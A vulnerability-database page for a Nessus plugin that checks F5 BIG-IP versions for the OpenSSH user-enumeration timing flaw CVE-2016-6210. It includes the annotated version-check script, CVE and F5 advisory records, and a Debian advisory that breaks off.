ID F5_BIGIP_SOL14845276.NASL Type nessus Reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
When sshd authenticates a user name that does not exist, it falls back to a
fake password structure hard-coded in the sshd source. In OpenSSH before 7.3,
when real accounts use SHA256/SHA512 password hashes, that fake entry is hashed
with Blowfish instead, so a remote, unauthenticated attacker who submits a very
long password can measure the response-time difference and enumerate valid
user names. (CVE-2016-6210)
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from F5 Networks BIG-IP Solution K14845276.
#
# The text description of this plugin is (C) F5 Networks.
#
include("compat.inc");
# Plugin registration. This is a local, version-only check (plugin_type
# "local"): it consumes the BIG-IP version / hotfix / module list gathered by
# f5_bigip_detect.nbin and never probes sshd itself. Because the version alone
# does not prove that the management SSH service is reachable or that password
# authentication is enabled, the finding is tagged potential_vulnerability and
# the plugin requires Settings/ParanoidReport.
if (description)
{
script_id(96106);
script_version("3.10");
script_cvs_date("Date: 2019/04/11 17:23:06");
# OpenSSH user-enumeration timing side channel; F5 tracks it as K14845276.
script_cve_id("CVE-2016-6210");
script_name(english:"F5 Networks BIG-IP : OpenSSH vulnerability (K14845276)");
script_summary(english:"Checks the BIG-IP version.");
script_set_attribute(
attribute:"synopsis",
value:"The remote device is missing a vendor-supplied security patch."
);
# Description text is (C) F5 Networks and is reproduced from the KB article.
script_set_attribute(
attribute:"description",
value:
"When SSHD tries to authenticate a non-existing user, it will pick up a
fake password structure hard-coded in the SSHD source code. An
attacker can measure timing information to determine if a user exists
when verifying a password. (CVE-2016-6210)"
);
script_set_attribute(
attribute:"see_also",
value:"https://support.f5.com/csp/article/K14845276"
);
# The F5 article also documents an interim mitigation when an upgrade is not
# immediately possible: restrict the source IP ranges allowed to reach SSH
# (F5 K5380). Only the upgrade is reported as the solution here.
script_set_attribute(
attribute:"solution",
value:
"Upgrade to one of the non-vulnerable versions listed in the F5
Solution K14845276."
);
# Confidentiality-only impact (disclosure of valid user names):
# CVSS2 base 4.3, CVSS3 base 5.9. Integrity and availability are untouched.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
# Public proof-of-concept user-enumeration scripts exist for this CVE.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Version-based inference only; see the paranoia gate in the check body.
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
# One CPE per BIG-IP module covered by the version matrix in the check body.
# NOTE(review): F5's table for K14845276 also lists BIG-IP WebSafe
# 11.6.0 - 11.6.3 as affected, but there is no WebSafe CPE or matrix entry
# here -- confirm whether the detect plugin can report that module at all.
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_visibility_and_reporting");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip_protocol_security_manager");
script_set_attribute(attribute:"patch_publication_date", value:"2016/12/22");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/27");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"F5 Networks Local Security Checks");
# All Host/BIG-IP/* keys come from f5_bigip_detect.nbin.
script_dependencies("f5_bigip_detect.nbin");
# Settings/ParanoidReport is mandatory: without paranoid reporting the check
# body audits out before consulting the version matrix.
script_require_keys("Host/local_checks_enabled", "Host/BIG-IP/hotfix", "Host/BIG-IP/modules", "Host/BIG-IP/version", "Settings/ParanoidReport");
exit(0);
}
include("f5_func.inc");
# Version-based check for CVE-2016-6210 (OpenSSH user enumeration through a
# timing side channel in password authentication) on BIG-IP, driven by the
# affected / not-affected ranges published in F5 K14845276.
#
# This never talks to sshd: it only compares the version, hotfix and module
# list collected by f5_bigip_detect.nbin against the matrix below, so it
# cannot tell whether management SSH is reachable or whether password
# authentication is enabled on the device. That is why the result is only
# reported in paranoid scans.

# Prerequisite knowledge-base items, checked in a fixed order so the audit
# message names the first thing that is missing.
if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
bigip_ver = get_kb_item("Host/BIG-IP/version");
if ( ! bigip_ver ) audit(AUDIT_OS_NOT, "F5 Networks BIG-IP");
if ( isnull(get_kb_item("Host/BIG-IP/hotfix")) ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/hotfix");
if ( ! get_kb_item("Host/BIG-IP/modules") ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/modules");

kb_article = "K14845276";
matrix = make_array();

# A matching version is not proof of exposure; only report when the scan
# policy asks for paranoid results.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Version ranges shared by most modules in the F5 table. Releases outside
# both lists (e.g. anything newer than 13.1.0) are not described by this
# matrix; how bigip_is_affected treats them is decided in f5_func.inc.
vuln_11x   = "11.4.0-11.6.3";
fixed_13x  = "13.0.0-13.1.0";
fixed_12x  = "12.0.0-12.1.3";
fixed_11_2 = "11.2.1";
fixed_10x  = "10.2.1-10.2.4";

# Advanced Firewall Manager
matrix["AFM"] = make_array();
matrix["AFM"]["affected"]   = make_list(vuln_11x);
matrix["AFM"]["unaffected"] = make_list(fixed_13x, fixed_12x);

# Application Acceleration Manager
matrix["AM"] = make_array();
matrix["AM"]["affected"]   = make_list(vuln_11x);
matrix["AM"]["unaffected"] = make_list(fixed_13x, fixed_12x);

# Access Policy Manager
matrix["APM"] = make_array();
matrix["APM"]["affected"]   = make_list(vuln_11x);
matrix["APM"]["unaffected"] = make_list(fixed_13x, fixed_12x, fixed_11_2, fixed_10x);

# Application Security Manager
matrix["ASM"] = make_array();
matrix["ASM"]["affected"]   = make_list(vuln_11x);
matrix["ASM"]["unaffected"] = make_list(fixed_13x, fixed_12x, fixed_11_2, fixed_10x);

# Application Visibility and Reporting (Analytics)
matrix["AVR"] = make_array();
matrix["AVR"]["affected"]   = make_list(vuln_11x);
matrix["AVR"]["unaffected"] = make_list(fixed_13x, fixed_12x, fixed_11_2);

# Global Traffic Manager (no 12.x/13.x entries: the F5 table lists those
# releases under BIG-IP DNS, which is not vulnerable)
matrix["GTM"] = make_array();
matrix["GTM"]["affected"]   = make_list(vuln_11x);
matrix["GTM"]["unaffected"] = make_list(fixed_11_2, fixed_10x);

# Link Controller
matrix["LC"] = make_array();
matrix["LC"]["affected"]   = make_list(vuln_11x);
matrix["LC"]["unaffected"] = make_list(fixed_13x, fixed_12x, fixed_11_2, fixed_10x);

# Local Traffic Manager
matrix["LTM"] = make_array();
matrix["LTM"]["affected"]   = make_list(vuln_11x);
matrix["LTM"]["unaffected"] = make_list(fixed_13x, fixed_12x, fixed_11_2, fixed_10x);

# Policy Enforcement Manager
matrix["PEM"] = make_array();
matrix["PEM"]["affected"]   = make_list(vuln_11x);
matrix["PEM"]["unaffected"] = make_list(fixed_13x, fixed_12x);

# Protocol Security Manager: only 11.4.x is listed as affected by F5.
matrix["PSM"] = make_array();
matrix["PSM"]["affected"]   = make_list("11.4.0-11.4.1");
matrix["PSM"]["unaffected"] = make_list(fixed_11_2, fixed_10x);

# Report when any detected module falls in its affected range.
if (bigip_is_affected(vmatrix:matrix, sol:kb_article))
{
  if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());
  else security_warning(0);
  exit(0);
}

# Otherwise explain why nothing was reported: either the detected modules
# are on a fixed release, or none of the modules above is installed.
mods = bigip_get_tested_modules();
prefix = "For BIG-IP module(s) " + mods + ",";
if (mods) audit(AUDIT_INST_VER_NOT_VULN, prefix, bigip_ver);
else audit(AUDIT_HOST_NOT, "running any of the affected modules");
{"id": "F5_BIGIP_SOL14845276.NASL", "bulletinFamily": "scanner", "title": "F5 Networks BIG-IP : OpenSSH vulnerability (K14845276)", "description": "When SSHD tries to authenticate a non-existing user, it will pick up a\nfake password structure hard-coded in the SSHD source code. An\nattacker can measure timing information to determine if a user exists\nwhen verifying a password. (CVE-2016-6210)", "published": "2016-12-27T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/96106", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.f5.com/csp/article/K14845276"], "cvelist": ["CVE-2016-6210"], "type": "nessus", "lastseen": "2021-01-01T01:57:57", "edition": 31, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6210"]}, {"type": "f5", "idList": ["F5:K14845276"]}, {"type": "redhat", "idList": ["RHSA-2017:2563", "RHSA-2017:2029"]}, {"type": "debian", "idList": ["DEBIAN:DLA-578-1:0E24B", "DEBIAN:DSA-3626-1:F9FBB"]}, {"type": "hackerone", "idList": ["H1:476439"]}, {"type": "archlinux", "idList": ["ASA-201608-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808936", "OPENVAS:1361412562310140073", "OPENVAS:1361412562310809154", "OPENVAS:1361412562310703626", "OPENVAS:1361412562310809121", "OPENVAS:1361412562310811729", "OPENVAS:1361412562310882763", "OPENVAS:1361412562311220171190", "OPENVAS:703626", "OPENVAS:1361412562311220171189"]}, {"type": "nessus", "idList": ["EULEROS_SA-2017-1189.NASL", "DEBIAN_DLA-578.NASL", "ORACLEVM_OVMSA-2017-0150.NASL", "DEBIAN_DSA-3626.NASL", "CENTOS_RHSA-2017-2563.NASL", "ORACLELINUX_ELSA-2017-2563.NASL", "FREEBSD_PKG_ADCCEFD1708011E6A2CBC80AA9043978.NASL", "EULEROS_SA-2017-1190.NASL", "FEDORA_2016-7440FA5CE2.NASL", "REDHAT-RHSA-2017-2563.NASL"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:137942", "PACKETSTORM:138006"]}, {"type": "zdt", "idList": ["1337DAY-ID-25438", "1337DAY-ID-25440"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF", "EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF"]}, {"type": "exploitdb", "idList": ["EDB-ID:40113", "EDB-ID:40136"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2563", "ELSA-2017-2029"]}, {"type": "fedora", "idList": ["FEDORA:95DA6605E7DF"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0036"]}, {"type": "centos", "idList": ["CESA-2017:2563", "CESA-2017:2029"]}, {"type": "freebsd", "idList": ["ADCCEFD1-7080-11E6-A2CB-C80AA9043978"]}, {"type": "slackware", "idList": ["SSA-2016-219-03"]}, {"type": "ubuntu", "idList": ["USN-3061-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:3C7597DAEB0A160E9DA1752927007C7C"]}, {"type": "symantec", "idList": ["SMNTC-1390"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY9.ASC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS"]}, {"type": "amazon", "idList": ["ALAS-2017-898"]}, {"type": "gentoo", "idList": ["GLSA-201612-18"]}], "modified": "2021-01-01T01:57:57", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-01-01T01:57:57", "rev": 2}, "vulnersScore": 5.4}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K14845276.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96106);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"F5 Networks BIG-IP : OpenSSH vulnerability (K14845276)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"When SSHD tries to authenticate a non-existing user, it will pick up a\nfake password structure hard-coded in the SSHD source code. An\nattacker can measure timing information to determine if a user exists\nwhen verifying a password. (CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K14845276\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K14845276.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K14845276\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.2.1\",\"10.2.1-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\",\"11.2.1\",\"10.2.1-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.4.0-11.6.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = 
make_list(\"13.0.0-13.1.0\",\"12.0.0-12.1.3\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.4.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.1\",\"10.2.1-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "naslFamily": "F5 Networks Local Security Checks", "pluginID": "96106", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "scheme": null, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}}
{"cve": [{"lastseen": "2020-12-09T20:07:40", "description": "sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-13T17:59:00", "title": "CVE-2016-6210", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6210"], "modified": "2019-02-07T11:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.2"], "id": "CVE-2016-6210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6210", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.2:p2:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-11-14T21:21:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210"], "description": "\nF5 Product Development has assigned ID 605497 (BIG-IP), ID 606040 (BIG-IQ and F5 iWorkflow), and ID 431179 (ARX) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H14845276 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP AAM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | Medium | OpenSSH \nBIG-IP AFM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | Medium | OpenSSH \nBIG-IP Analytics | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.2.1 | Medium | OpenSSH \nBIG-IP APM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP ASM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b\u200b\u200b\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP DNS | None | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b\u200b\u200b | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | 11.4.0 - 11.6.3 \n | 11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP Link Controller | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n\u200b\u200b\u200b\u200b\u200b\u200b11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP PEM | 11.4.0 - 11.6.3 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b | Medium | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | 11.2.1 \n10.2.1 - 10.2.4 | Medium | OpenSSH \nBIG-IP WebAccelerator | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebSafe | 11.6.0 - 11.6.3 
| 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3\u200b\u200b\u200b\u200b | Medium | OpenSSH \nARX | 6.2.0 - 6.4.0 | None | Low | OpenSSH \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | Medium | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.2.0 | 2.3.0 | Medium | OpenSSH \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability for BIG-IP systems, you can limit the allowable IP address ranges for secure shell (SSH) access. To do so, refer to [K5380: Specifying allowable IP ranges for SSH access](<https://support.f5.com/csp/article/K5380>).\n\n**Impact of action:** Before performing this action, ensure that the IP address used to access the BIG-IP system from SSH is included in the allowable IP address range. 
If the IP address is not included in the allowable IP address range, you will lose access to the BIG-IP system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2018-04-17T17:50:00", "published": "2016-12-23T03:42:00", "id": "F5:K14845276", "href": "https://support.f5.com/csp/article/K14845276", "title": "OpenSSH vulnerability CVE-2016-6210", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:00:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "Package : openssh\nVersion : 6.0p1-4+deb7u5\nCVE ID : CVE-2016-6210\n\nOpenSSH secure shell client and server had a user enumeration\nproblem reported.\n\nCVE-2016-6210\n\n User enumeration via covert timing channel\n\n\nFor Debian 7 "Wheezy", this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n- -- \n --------------------- Ola Lundqvist ---------------------------\n/ opal@debian.org Folkebogatan 26 \\\n| ola@inguza.com 654 68 KARLSTAD |\n| http://inguza.com/ +46 (0)70-332 1551 |\n\\ gpg/f.p.: 22F2 32C6 B1E0 F4BF 2B26 0A6A 5E90 DCFA 9426 876F /\n 
